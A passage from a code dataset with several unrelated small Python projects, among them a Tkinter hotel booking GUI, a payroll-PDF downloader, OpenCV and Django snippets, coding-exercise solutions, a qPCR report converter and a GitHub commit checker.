= Tk()\n\tfr.title('find room')\n\tfr.geometry('600x600')\n\tfr['bg'] = '#bed2ed'\n\n\thn = Label(fr, text = \"Enter the Hotel Name\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\thn.place(x=150,y=50)\n\thne = Entry(fr,width=25,font=(\"arial\", 20))\n\thne.place(x=100,y=100)\n\n\trt = Label(fr, text = \"Enter the Room Type\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\trt.place(x=150,y=200)\n\trte = Entry(fr,width=25,font=(\"arial\", 20))\n\trte.place(x=100,y=250)\n\n\tpr_btn = Button (fr, text = \"Proceed\", font=(\"arial\", 20, \"bold\"), command = proceed_fr)\n\tpr_btn.place(x=200, y=380, width = 200 )\n\n\n\n\ndef bookroom():\n\t\n\tglobal hce, rne\n\tbr = Tk()\n\tbr.title('book room')\n\tbr.geometry('600x600')\n\tbr['bg'] = '#bed2ed'\n\n\thn = Label(br, text = \"Enter the Hotel Name\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\thn.place(x=150,y=50)\n\thce = Entry(br,width=25,font=(\"arial\", 20))\n\thce.place(x=100,y=100)\n\n\trn = Label(br, text = \"Enter the Room Number\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\trn.place(x=150,y=200)\n\trne = Entry(br,width=25,font=(\"arial\", 20))\n\trne.place(x=100,y=250)\n\n\tpr_btn = Button (br, text = \"Proceed\", font=(\"arial\", 20, \"bold\"), command = proceed_br)\n\tpr_btn.place(x=200, y=380, width = 200 )\n\n\n\n\n\n\t\n\n\nfr_btn = Button (root, text = \"find room\", font=(\"arial\", 20, \"bold\"), command = findroom)\nfr_btn.place(x=200, y=270, width = 200 )\n\nrb_btn = Button(root, text=\"room book\", font=(\"arial\", 20, \"bold\"), command = bookroom)\nrb_btn.place(x=200, y=350, width = 200 )\n\n\n\n# fontStyles = tkFont.Font(family=\"Calibri\", size=15)\n# sel = Label(root, text = \"Please enter the room number\", font = fontStyle, bg='#bed2ed')\n# sel.grid(row = 40, column = 10)\n\n# name = Entry(width=30)\n# name.place(x=0,y=200)\nconn.commit()\nconn.close()\nroot.mainloop() ","repo_name":"daghariddhi/dbms","sub_path":"dbmsp.py","file_name":"dbmsp.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16635004135","text":"#!/usr/bin/env python\nimport logging\nimport os\nimport gettext\nimport argparse\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\n\nVERSION = '1.0.0'\n\n\ndef setup_argparse():\n    locale_dir = os.path.join(os.path.dirname(__file__), \"locale\")\n    argparse_ptbr_translation = gettext.translation(\n        'argparse', localedir=locale_dir, languages=['pt_BR'])\n\n    # Override argparse's native methods with the pt_BR translation\n    # pyright: reportGeneralTypeIssues=none\n    argparse.gettext = argparse_ptbr_translation.gettext\n    argparse.ngettext = argparse_ptbr_translation.ngettext\n    argparse._ = argparse.gettext\n\n    parser = argparse.ArgumentParser(\n        description=f'Download e-folha PDFs - v{VERSION}')\n    parser.add_argument('-d', '--debug', action='store_true',\n                        help='Show debug messages')\n    parser.add_argument('-v', '--verbose', action='store_true',\n                        help='Increase verbosity')\n    parser.add_argument('cliente', type=int,\n                        choices=[50, 21], help='Client ID in e-folha (50=ALESP or 21=TJ)')\n    parser.add_argument('matricula', type=int, help='Employee registration number')\n    parser.add_argument('senha', type=str, help='Employee password')\n    parser.add_argument('-o', dest='output', type=str, default='./saida',\n                        help='Path where files are saved (default: ./saida) ')\n    return parser\n\n\ndef main():\n    if (sys.argv[0].endswith('main.py')):\n        logging.critical(\n            'Please run this script 
from \\'efolha-cli\\' from root folder')\n exit(1)\n parser = setup_argparse()\n args = parser.parse_args()\n log = logging.getLogger()\n logging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n if args.debug:\n log.setLevel(logging.DEBUG)\n log.debug(args)\n elif args.verbose:\n log.setLevel(logging.INFO)\n else:\n log.setLevel(logging.WARNING)\n\n session, response = get_html_folhas(args, log)\n\n all_links = extrai_links(log, response)\n\n download_arquivos(args, log, session, all_links)\n\n\ndef download_arquivos(args, log, session, all_links):\n log.info('Salvando arquivos em: ' + args.output)\n for link in all_links:\n tipo, sequencia, mesref, anoref, str_target = link['onclick'].replace(\n 'Atualiza(', '').replace(');', '').replace('\\'', '').split(',')\n\n local_filename = os.path.realpath(f'{args.output}/{args.matricula}/{anoref}/'\n f'{anoref}-{mesref}-{tipo}-{sequencia}-{args.matricula}.pdf')\n log.debug(local_filename)\n if not os.path.exists(os.path.dirname(local_filename)):\n os.makedirs(os.path.dirname(local_filename), exist_ok=True)\n\n if not os.path.exists(local_filename):\n log.info('Baixando folha %s-%s-%s', anoref, mesref, sequencia)\n response = session.post(\n 'https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/DemPagtoP.asp',\n data={\n 'Tipo': tipo,\n 'sequencia': sequencia,\n 'mesref': mesref,\n 'anoref': anoref,\n 'strTarget': str_target\n }, stream=True)\n with open(local_filename, 'wb') as output_pdf:\n for chunk in response.iter_content(chunk_size=8192):\n output_pdf.write(chunk)\n else:\n log.warning('Arquivo %s já existe', local_filename)\n\n\ndef extrai_links(log, response):\n soup = BeautifulSoup(response.text, 'html5lib')\n all_links = soup.find_all('img', {'alt': 'pdf', 'onclick': True})\n log.debug(all_links)\n return all_links\n\n\ndef get_html_folhas(args, log):\n session = requests.Session()\n log.debug('Pegando cookie')\n response = session.get(f'https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/entrada.asp?'\n f'cliente={str(args.cliente).zfill(3)}')\n log.debug(response.cookies)\n\n log.debug('Fazendo login')\n response = session.post('https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/PesqSenha.asp',\n data={\n 'txtMatricula': str(args.matricula).zfill(6),\n 'txtSenha': args.senha,\n 'txtNPA': '000000000',\n 'btOK': 'ENTRAR'\n })\n log.debug(response.status_code)\n\n log.debug('Listando folhas')\n response = session.post(\n 'https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/Folhas.asp')\n\n return session, response\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fcrespo82/efolhadownloader","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16555116522","text":"\"\"\"\n# 박수박수박수박수박수?\n* 문제 설명\n길이가 n이고, \"수박수박수박수....\"와 같은 패턴을 유지하는 문자열을 리턴하는 함수, solution을 완성하세요. 
\n* Constraints\nn is a natural number no greater than 10,000.\n\"\"\"\n# Example input/output\n# +---------------+\n# | n | return    |\n# |---|-----------|\n# | 3 | \"수박수\"   |\n# | 4 | \"수박수박\" |\n# +---------------+\n\ndef solution(n):\n    answer = ''\n\n    for i in range(1, n + 1):  # loop i from 1 through n\n        if i % 2 == 1:  # if i is odd\n            answer += '수'  # append '수' to answer\n        else:  # otherwise\n            answer += '박'  # append '박' to answer\n\n    return answer  # return the answer string","repo_name":"Junhong0209/Coding-test","sub_path":"Programers/연습문제/수박수박수박수박수박수.py","file_name":"수박수박수박수박수박수.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4669588234","text":"from django.conf.urls import include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nimport hello.views\n\n# Examples:\n# url(r'^$', 'gettingstarted.views.home', name='home'),\n# url(r'^blog/', include('blog.urls')),\n\nurlpatterns = [\n    url(r'^$', hello.views.index, name='index'),\n    url(r'^trees$', hello.views.googlemapstrees, name='trees'),\n    url(r'^cars$', hello.views.cars, name='cars'),\n    url(r'^carsandtrees$', hello.views.carsandtrees, name='carsandtrees'),\n    url(r'^houses$', hello.views.houses, name='houses'),\n    url(r'^united$', hello.views.united, name='united'),\n    url(r'^leaflet$', hello.views.leaflet, name='leaflet'),\n    url(r'^dataset$', hello.views.titanic_json, name='dataset'),\n    url(r'^trees_json$', hello.views.trees_json, name='trees_json'),\n    url(r'^cars_json$', hello.views.cars_json, name='cars_json'),\n    url(r'^houses_json$', hello.views.houses_json, name='houses_json'),\n    url(r'^roads_json$', hello.views.roads_json, name='roads_json'),\n    url(r'^admin/', include(admin.site.urls)),\n]\n","repo_name":"proggeo/django-titanic-a3","sub_path":"gettingstarted/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14987572820","text":"def Deposit():\n    Dep = int(input(\"Input start deposit: \"))\n    Term = int(input(\"Input term in years: \"))\n    Percent = int(input(\"Input percent: \"))\n
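    # Monthly compounding below: each month the balance grows by\n    # Percent/(12*100), i.e. Dep_(k+1) = Dep_k * (1 + Percent/1200).\n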
    if Term > 5:\n        print(\"Maximum term is 5 years. Input correct term\")\n    elif Term <= 0:\n        print(\"Input correct term\")\n    elif Dep < 0:\n        print(\"The deposit cannot be negative. Input correct deposit\")\n    else:\n        Term = Term*12\n        i = 0\n        while i < Term: \n            Dep = round(Dep+Dep*Percent/(12*100), 2)\n            i += 1\n            print(\"Number of months: \",i,\", deposit: \", Dep, \"BYN\")\n    return Dep\nDeposit()","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Kaplunou/Task1/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44088568545","text":"import cv2\nimport numpy as np\n\n\nif __name__ == \"__main__\":\n    print(\"Running...\")\n    \n    # init.\n    imgSize = np.array([500,500], np.int32) # width, height\n    center = np.array([250,250], np.float16) # x, y\n    size = np.array([100, 200], np.float16) # width, height (major, minor)\n    dreg = 0\n    interval = 25\n    \n    pause = False\n    while True:\n        if not pause:\n            # find major and minor axes.\n            MA = np.array([np.cos(np.radians(dreg)) * size[0]/2, np.sin(np.radians(dreg)) * size[0]/2])\n            ma = np.array([np.cos(np.radians(dreg + 90)) * size[1]/2, np.sin(np.radians(dreg + 90)) * size[1]/2])\n            # init rect.\n            rect = cv2.RotatedRect(center, size, dreg)\n            points = cv2.boxPoints(rect)\n            # empty image.\n            img = np.zeros(np.flip(imgSize), np.uint8)\n            # rotation annotation.\n            cv2.ellipse(img, center.astype(np.int32), (50, 50), 0, 0, dreg, 25, cv2.FILLED)\n            # guide lines.\n            cv2.line(img, (center[0].astype(np.int32), 0), (center[0].astype(np.int32), imgSize[1]), 50, 1)\n            cv2.line(img, (0, center[1].astype(np.int32)), (imgSize[0], center[1].astype(np.int32)), 50, 1)\n            cv2.arrowedLine(img, center.astype(np.int32), (center[0].astype(np.int32), imgSize[1]-10), 100, 1, tipLength=0.04)\n            cv2.arrowedLine(img, center.astype(np.int32), (imgSize[0]-10, center[1].astype(np.int32)), 100, 1, tipLength=0.04)\n            cv2.putText(img, \"y\", (center[0].astype(np.int32)+10, imgSize[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, 100, 1)\n            cv2.putText(img, \"x\", (imgSize[0]-20, center[1].astype(np.int32)-10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, 100, 1)\n            # ellipse\n            cv2.ellipse(img, rect, 255, 1)\n            # bounding box.\n            cv2.polylines(img, [points.astype(np.int32)], isClosed=True, color=100, thickness=1)\n            for i, p in enumerate(points.astype(np.int32)):\n                cv2.putText(img, str(i), p, cv2.FONT_HERSHEY_SIMPLEX, 0.6, 100, 1)\n            # major and minor axes.\n            cv2.arrowedLine(img, center.astype(np.int32), (center + MA).astype(np.int32), 255, 1, tipLength=0.1)\n            cv2.arrowedLine(img, center.astype(np.int32), (center + ma).astype(np.int32), 255, 1, tipLength=0.1)\n            cv2.putText(img, \"MAJOR\", (center + MA).astype(np.int32), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 255, 1)\n            cv2.putText(img, \"minor\", (center + ma).astype(np.int32), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 255, 1)\n            # rotation annotation.\n            cv2.circle(img, center.astype(np.int32), 2, 255, 2)\n            cv2.putText(img, f\"{int(dreg)}\", (center + np.array([np.cos(np.radians(dreg/2)) * size[0]/2, np.sin(np.radians(dreg/2)) * size[0]/2])).astype(np.int32), cv2.FONT_HERSHEY_SIMPLEX, 0.6, 255, 1)\n        # show.\n        cv2.imshow(\"Rotate\", img)\n        k = cv2.waitKey(interval)\n        if k == ord('q'):\n            cv2.destroyAllWindows()\n            break\n        elif k == ord('s'):\n            pause = not pause\n        elif k == ord(']'):\n            if interval > 10:\n                interval -= 5\n        elif k == ord('['):\n            if interval < 100:\n                interval += 5\n        # next\n        if not pause:\n            dreg += 1\n            dreg %= 360    \n    \n    print(\"End!\")\n
","repo_name":"rapee9999/LearnCV","sub_path":"rotate_rect.py","file_name":"rotate_rect.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23512446437","text":"# Python program to illustrate\n# Iterating over a list\ndef list_fn():\n print(\"List Iteration\")\n l = [\"Welcome\", \"to\", \"Python\"]\n for i in l:\n print(i)\n return l\n\n# Iterating over a tuple (immutable)\nprint(\"\\nTuple Iteration\")\nt = (\"welcome\", \"to \", \"python\")\nfor i in t:\n print(i)\n\n# Iterating over a String\nprint(\"\\nString Iteration\")\ns = \"python\"\nfor i in s:\n print(i)\n\n# Iterating over dictionary\nprint(\"\\nDictionary Iteration\")\nd = dict()\nd['xyz'] = 123\nd['abc'] = 345\nfor i in d:\n print(\"%s %d\" % (i, d[i]))\n\n# Iterating over a set\nprint(\"\\nSet Iteration\")\nset1 = {1, 2, 3, 4, 5, 6}\nfor i in set1:\n print(i),\n\n\nif __name__ == \"__main__\":\n list_fn()\n","repo_name":"ValarmathyRamachandran/Basic-Topics-Python-Practice","sub_path":"loops/for.py","file_name":"for.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23656719270","text":"from helper import *\nfrom bs4 import BeautifulSoup\nimport docx\nfrom docx.shared import Pt,Inches,Cm\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT\nfrom docx.shared import RGBColor\nimport os\n\n\ndef __all_data(path):\n # print(html)\n td = read_html(path)\n # td = pd.read_html(html)[0]\n # print(td.head)\n # print(td[4:5])\n # print(td[16:17])\n # a=pd.DataFrame(td[0:20])\n # a=a.values.tolist()\n # print(a)\n # for i in a:\n # print(i)\n alldata = []\n flag = False\n for row in td:\n # print(row)\n if row[2] == 'Color':\n flag = True\n continue\n if flag:\n if row[2].startswith('Statistical'):\n # print('\\n11111\\n',row)\n break\n # print(row)\n items = row[5:11] + row[17:25] + row[31:37]\n alldata.append(items)\n return alldata\n\n\ndef get_img(path):\n with open(path, 'r') as f:\n html = f.read()\n soup = BeautifulSoup(html, 'lxml')\n tables = soup.findAll('table')\n tab = tables[0]\n flag = False\n for tr in tab.findAll('tr'):\n if flag:\n img = tr.findAll('img')\n src=img[0].get('src')\n return src\n for td in tr.findAll('td'):\n text = td.getText()\n if text.startswith('Amplification'):\n # print(text)\n flag = True\n break\n\n\ndef get_all_table(path):\n alldata = __all_data(path=path)\n table = []\n for row in alldata:\n row = list(map(sub, row))\n # print(row)\n table.append(row)\n return table\n\n\n# tables = get_all_tables()\ncolumns = ['Position', 'Sample Name', 'Gene Name', 'Cq', 'Concentration', 'Call', # 'Excluded',\n 'Sample Type', 'Standard', 'Cq Mean', 'Cq Error', 'Concentration Mean', 'Concentration Error',\n 'Replicate Group', 'Dye', # 'Edited Call',\n 'Slope', 'EPF', 'Failure', 'Notes', 'Prep Notes', 'Number']\n\n\ndef all_table2df(table):\n df = pd.DataFrame(table, columns=columns)\n return df\n\n\ndef to_csv(table, path=None):\n df = all_table2df(table)\n # import numpy as np\n # df = df.replace('nan', '')\n # df['Number'] = df['Number'].astype(float)\n # df['Number'] = df['Number'].astype(int)\n # print(df.head())\n df.to_csv('a.csv', index=None)\n\n\ndef html2pdf(table):\n df = all_table2df(table)\n a = df.to_html(index=False)\n # print(a)\n import pdfkit\n options = {\n 'page-size': 'Letter',\n 'encoding': \"UTF-8\",\n 'custom-header': [\n ('Accept-Encoding', 'gzip')\n ]\n }\n path_wk = 
    path_wk = r'D:\\wkhtmltox\\bin\\wkhtmltopdf.exe'  # install location\n    config = pdfkit.configuration(wkhtmltopdf=path_wk)\n    pdfkit.from_string(a, \"test.pdf\", configuration=config, options=options)\n\n\ndef all_table2doc(table, img, path='all_data.docx'):\n    # convert to docx\n    doc = docx.Document()  # create a new document\n    p = doc.add_paragraph('')\n    r = p.add_run(r'3. Analysis')\n    r.font.bold = True  # bold\n    p = doc.add_paragraph('')\n    r = p.add_run(r'Abs Quant')\n    r.font.bold = True  # bold\n    # Curves\n    p = doc.add_paragraph('')\n    p.add_run(r'Ampification Curves')\n    p=doc.add_picture(img,width=Inches(6))\n    p.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n    # Result Table\n    p = doc.add_paragraph('')\n    p.add_run(r'Result Table')\n\n    td = []\n    table.insert(0, columns)\n    for row in table:\n        # items = row[:6] + row[13:14]\n        items=row\n        td.append(items)\n\n    rows, cols = len(td), len(td[0])\n    # print(rows, cols)\n    table = doc.add_table(rows=rows, cols=cols, style='Table Grid')\n    table.columns[1].width = Pt(2)\n    table.columns[2].width = Pt(2)\n    # iterate over the table\n    for r in range(rows):\n        for c in range(cols):\n            run = table.cell(r, c).paragraphs[0].add_run(td[r][c])  # content to fill in\n            if r == 0:\n                # run.font.name = 'Times New Roman'  # set the font\n                # run.font.size = Pt(11)  # set the font size\n                run.font.bold = 1  # set bold\n                # run.font.color.rgb = RGBColor.from_string('00BFFF')  # set the text colour\n                table.cell(r, c).paragraphs[0].alignment = WD_PARAGRAPH_ALIGNMENT.CENTER  # centre the cell\n    # for r, row in enumerate(table.rows):\n    #     for c in range(len(row.cells)):\n    #         # print(c)\n    #         row.cells[c].text = td[r][c]\n    table.cell(0, 1).width = Cm(5)\n    table.cell(0, 2).width = Cm(4)\n    # table.autofit = True\n    doc.save(path)\n\n\n\nif __name__ == '__main__':\n    path = r'data/Demo_10-Fold Dilution/report_resources/abs quant001.html'\n    # path = r'data/Demo_Qual Detect Mono Color/report_resources/abs quant001.html'\n    table = get_all_table(path=path)\n    for i in table:\n        print(i)\n    # print(tables)\n    src = get_img(path)\n    print(src)\n    img_path = os.path.join(os.path.dirname(path), src)\n    all_table2doc(table,img_path)\n    to_csv(table)\n\n    # with open(path, 'r') as f:\n    #     html = f.read()\n    # soup = BeautifulSoup(html, 'lxml')\n    # # img = soup.find_all('img')\n    # # src=img[0].get('src')\n    # # for i in range(len(img)):\n    # #     print(img[i].get('src'))\n    # tables = soup.findAll('table')\n    # tab = tables[0]\n    # flag = False\n    # for tr in tab.findAll('tr'):\n    #     if flag:\n    #         img = tr.findAll('img')\n    #         print(tr)\n    #         print(tr.get('src'))\n    #         print(img[0].get('src'))\n    #         break\n    #     for td in tr.findAll('td'):\n    #         text = td.getText()\n    #         if text.startswith('Amplification'):\n    #             print(text)\n    #             flag = True\n    #             break\n","repo_name":"chenwi/part_time_job_yg","sub_path":"codes/get_all_data.py","file_name":"get_all_data.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15279524040","text":"from GenericRequest import GenericRequest\n\nclass AddPlayerToClanRequest(GenericRequest):\n    \"Accepts a given player to the clan\"\n\n    def __init__(self, session, playerId):\n        super(AddPlayerToClanRequest, self).__init__(session)\n        self.url = session.serverURL + \"clan_applications.php\"\n        self.requestData[\"pwd\"] = session.pwd\n        self.requestData['action'] = \"process\"\n        self.requestData['request%s' % playerId] = 1\n    def parseResponse(self):\n        if \"Clan application(s)\" in self.responseText:\n            self.responseData[\"success\"] = True\n        else:\n            self.responseData[\"success\"] = 
False\n","repo_name":"BearMinimum98/redditbot","sub_path":"kol/request/AddPlayerToClanRequest.py","file_name":"AddPlayerToClanRequest.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19942945624","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\n\n# Exploratory Data Analysis - Laptops Pricing\n\nurl = \"https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DA0101EN-Coursera/laptop_pricing_dataset_mod2.csv\"\n\n\ndf = pd.read_csv(url, header=0)\n# print(df.head(6))\n\n# Task 1 - Visualize individual feature patterns\n# Generate regression plots for each of the parameters \"CPU_frequency\", \"Screen_Size_inch\" and \"Weight_pounds\" against \"Price\". \n# Also, print the value of correlation of each feature with \"Price\".\n\n\n\n# CPU_frequency plot\nsns.regplot(x=\"CPU_frequency\", y=\"Price\", data=df)\nplt.ylim(0,)\n\n\n# Screen_Size_inch plot\nsns.regplot(x=\"Screen_Size_inch\", y=\"Price\", data=df)\nplt.ylim(0,)\n\n# Weight_pounds plot\nsns.regplot(x=\"Weight_pounds\", y=\"Price\", data=df)\nplt.ylim(0,)\n\n# Correlation values of the three attributes with Price\nfor param in [\"CPU_frequency\", \"Screen_Size_inch\",\"Weight_pounds\"]:\n print(f\"Correlation of Price and {param} is \", df[[param,\"Price\"]].corr())\n\n# Interpretation: \"CPU_frequency\" has a 36% positive correlation with the price of the laptops. The other two parameters have weak correlation with price.\n\n# Categorical features - Generate Box plots for the different feature that hold categorical values. These features would be \"Category\", \"GPU\", \"OS\", \"CPU_core\", \"RAM_GB\", \"Storage_GB_SSD\"\n\n\n# Category Box plot\nsns.boxplot(x=\"Category\", y=\"Price\", data=df)\n\n# GPU Box plot\nsns.boxplot(x=\"GPU\", y=\"Price\", data=df)\n\n# OS Box plot\nsns.boxplot(x=\"OS\", y=\"Price\", data=df)\n\n# CPU_core Box plot\nsns.boxplot(x=\"CPU_core\", y=\"Price\", data=df)\n\n# RAM_GB Box plot\nsns.boxplot(x=\"RAM_GB\", y=\"Price\", data=df)\n\n\n# Storage_GB_SSD Box plot\nsns.boxplot(x=\"Storage_GB_SSD\", y=\"Price\", data=df)\n\n\n# Task 2 - Descriptive Statistical Analysis - Generate the statistical description of all the features being used in the data set. 
Include \"object\" data types as well.\n\n\nprint(df.describe())\nprint(df.describe(include=['object']))\n\n# Task 3 - GroupBy and Pivot Tables - Group the parameters \"GPU\", \"CPU_core\" and \"Price\" to make a pivot table and visualize this connection using the pcolor plot.\n\n\n# Create the group\ndf_gptest = df[['GPU','CPU_core','Price']]\ngrouped_test1 = df_gptest.groupby(['GPU','CPU_core'],as_index=False).mean()\nprint(grouped_test1)\n\n# Create the Pivot table\ngrouped_pivot = grouped_test1.pivot(index='GPU',columns='CPU_core')\nprint(grouped_pivot)\n\n\n# Create the Plot\nfig, ax = plt.subplots()\nim = ax.pcolor(grouped_pivot, cmap='RdBu')\n\n#label names\nrow_labels = grouped_pivot.columns.levels[1]\ncol_labels = grouped_pivot.index\n\n#move ticks and labels to the center\nax.set_xticks(np.arange(grouped_pivot.shape[1]) + 0.5, minor=False)\nax.set_yticks(np.arange(grouped_pivot.shape[0]) + 0.5, minor=False)\n\n#insert labels\nax.set_xticklabels(row_labels, minor=False)\nax.set_yticklabels(col_labels, minor=False)\n\nfig.colorbar(im)\n\n\n\n# Task 4 - Pearson Correlation and p-values\n# Use the scipy.stats.pearsonr() function to evaluate the Pearson Coefficient and the p-values for each parameter tested above. \n# This will help you determine the parameters most likely to have a strong effect on the price of the laptops.\n\nfor param in ['RAM_GB','CPU_frequency','Storage_GB_SSD','Screen_Size_inch','Weight_pounds','CPU_core','OS','GPU','Category']:\n pearson_coef, p_value = stats.pearsonr(df[param], df['Price'])\n print(param)\n print(\"The Pearson Correlation Coefficient for \",param,\" is\", pearson_coef, \" with a P-value of P =\", p_value)\n\n\n\nplt.show()\n\n","repo_name":"Marcin-Lewandowski/Data_Science","sub_path":"EDA_Laptops_Pricing.py","file_name":"EDA_Laptops_Pricing.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17787989391","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if needle is \"\":\n return 0\n if haystack is \"\":\n return -1\n i = 0\n while i < len(haystack)-len(needle)+1: # 遍历源字符串\n save_i = i # 防止因为比对造成haystack的索引移动\n j = 0\n while haystack[i] == needle[j]:\n if j == len(needle)-1:\n return i - j\n j += 1\n i += 1\n i = save_i + 1\n return -1\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.strStr(\"mississippi\", \"issip\"))\n","repo_name":"Witness521/leetcode","sub_path":"数列/实现strStr().py","file_name":"实现strStr().py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41820691494","text":"import argparse\nimport json\nimport logging\n\nimport requests\n\nfrom rest_api import headers\nfrom utils import RData, AttrDict\n\n\ndef handle(data):\n logging.info(__name__)\n data = AttrDict.from_dict(data)\n assert data.repo\n assert data.branch\n r = requests.get(f'https://api.github.com/repos/{data.repo}/branches',\n headers=headers)\n r_data = json.loads(r.content)\n branch_filtered = [x for x in r_data if x['name'] == data.branch]\n\n rd = RData(False)\n if len(branch_filtered) != 1:\n print('false')\n raise RuntimeError(branch_filtered)\n branch_data = branch_filtered[0]\n if 'last_commit_sha' not in data.keys() or branch_data['commit']['sha'] != data.last_commit_sha:\n print('true')\n rd.data['last_commit_sha'] = branch_data['commit']['sha']\n rd.result = True\n else:\n print('false')\n rd.result = 
False\n return rd\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('repo')\n parser.add_argument('branch')\n parser.add_argument('last_commit_sha')\n\n handle(parser.parse_args().__dict__)\n","repo_name":"QZLin/ActionsTrigger","sub_path":"script/simple_new_commit.py","file_name":"simple_new_commit.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2415658905","text":"# Assignment-2\r\n\r\n# Abishek Lakshmirathan\r\n\r\nimport datetime\r\nimport csv\r\nfrom collections import OrderedDict\r\nfrom math import sqrt\r\n\r\nclass DataFrame(object):\r\n\r\n @classmethod\r\n\r\n def from_csv(cls, file_path, delimiting_character=',', quote_character='\"'):\r\n with open(file_path, 'rU') as infile:\r\n reader = csv.reader(infile, delimiter=delimiting_character, quotechar=quote_character)\r\n data_collection = []\r\n for index, row in enumerate(reader):\r\n if index == 559:\r\n row[2] = row[2].replace(',', '')\r\n data_collection.append(row)\r\n return cls(list_of_lists=data_collection)\r\n\r\n\r\n # Task 3\r\n\r\n @classmethod\r\n def get_column_type(self, column, col_collection):\r\n is_int = True\r\n for col in col_collection:\r\n try:\r\n if isinstance(int(col), int) is False:\r\n is_int = False\r\n except ValueError:\r\n is_int = False\r\n if is_int:\r\n return int\r\n else:\r\n\r\n # Checking if all items of the column are dates\r\n is_date = True\r\n # try:\r\n for col in col_collection:\r\n if isinstance(col, int):\r\n is_date = False\r\n else:\r\n try:\r\n if not (isinstance(datetime.datetime.strptime(col, '%m/%d/%y %H:%M'), datetime.datetime)):\r\n is_date = False\r\n except ValueError:\r\n is_date = False\r\n if is_date:\r\n\r\n # converting each entry into Datetime objects\r\n\r\n for index, entry in enumerate(col_collection):\r\n col_collection[index] = datetime.datetime.strptime(entry, '%m/%d/%y %H:%M')\r\n return datetime\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n return None\r\n\r\n\r\n @classmethod\r\n def min(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type=self.get_column_type(column, col_collection)\r\n if col_type == int:\r\n return min(col_collection)\r\n elif col_type == datetime:\r\n return min(col_collection)\r\n else:\r\n return None\r\n\r\n @classmethod\r\n def max(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n if col_type == int:\r\n return max(col_collection)\r\n elif col_type == datetime:\r\n return max(col_collection)\r\n else:\r\n return None\r\n\r\n @classmethod\r\n def median(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n if col_type == int or col_type == datetime:\r\n col_collection = sorted(col_collection)\r\n if len(col_collection) % 2 == 1:\r\n median = (len(col_collection)+1)/2\r\n return col_collection[median]\r\n else:\r\n median1 = len(col_collection)/2\r\n median2 = median1+1\r\n return col_collection[(median1 + median2)/2]\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n @classmethod\r\n def mean(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n sum=0\r\n if col_type == int:\r\n for col in 
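The commit-watcher record above polls the GitHub branches endpoint and compares head SHAs; the core call isolated as a sketch (repo/branch values and the headers dict are whatever the caller supplies):

```python
# Sketch: fetch a branch's head commit SHA from the GitHub REST API.
import requests

def branch_head_sha(repo, branch, headers=None):
    r = requests.get(f"https://api.github.com/repos/{repo}/branches",
                     headers=headers, timeout=10)
    r.raise_for_status()
    matches = [b for b in r.json() if b["name"] == branch]
    if len(matches) != 1:
        raise RuntimeError(f"branch {branch!r} not found in {repo}")
    return matches[0]["commit"]["sha"]
```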
